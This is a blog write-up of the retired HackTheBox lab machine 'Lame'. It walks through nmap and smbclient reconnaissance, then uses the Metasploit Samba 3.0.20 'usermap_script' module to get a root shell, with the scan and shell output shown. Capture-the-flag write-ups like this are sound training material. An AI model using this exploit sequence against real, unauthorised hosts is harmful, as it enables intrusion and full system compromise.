Jason Turley's Website

HackTheBox: Lame Writeup

Lame is a retired HTB machine.

Recon

As usual, start off with an nmap scan:

$ nmap -Pn -sV -sC 10.10.10.3 -oN nmap_scan.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times
will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 11:46 EDT
Nmap scan report for 10.10.10.3
Host is up (0.13s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h04m46s, deviation: 2h49m44s, median: 4m44s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-03-24T11:51:10-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds

Lots of interesting findings! We see that the target OS is Unix and there are FTP, SSH, and Samba servers running.

Since we specified -sC, the nmap scan determined that anonymous FTP login is allowed. I explored this for a bit, but did not find anything interesting on the server.

The same is true for the Samba server. Running smbclient -L shows that there are several shares listed:

$ smbclient -L //10.10.10.3/   
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

I searched the shares, but again, nothing interesting was found.

Since there aren’t any leaked credentials or other obvious leads, let’s search around for an exploit. In my experience with CTFs, if Samba is running then it is usually exploitable. Let’s search for a Samba 3.0.20 exploit!

Exploitation

There is only one module available in metasploit when searching searching for Samba 3.0.20:

> search samba 3.0.20
Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Well, this makes our job easy!

Set the RHOSTS and LHOST options to the correct IP addresses and run the exploit. After a few seconds you should get a root shell! (Note: there is no prompt)

whoami
root
id
uid=0(root) gid=0(root)

From here the user and root flags can be found in /home/makis/user.txt and /root/root.txt respectively.

Concluding Thoughts

Lame is a pretty straight-forward machine that is great for beginners. I probably spent too much time on the FTP and Samba share rabbit holes, but oh well, I didn’t want to miss anything.

#writeups #linux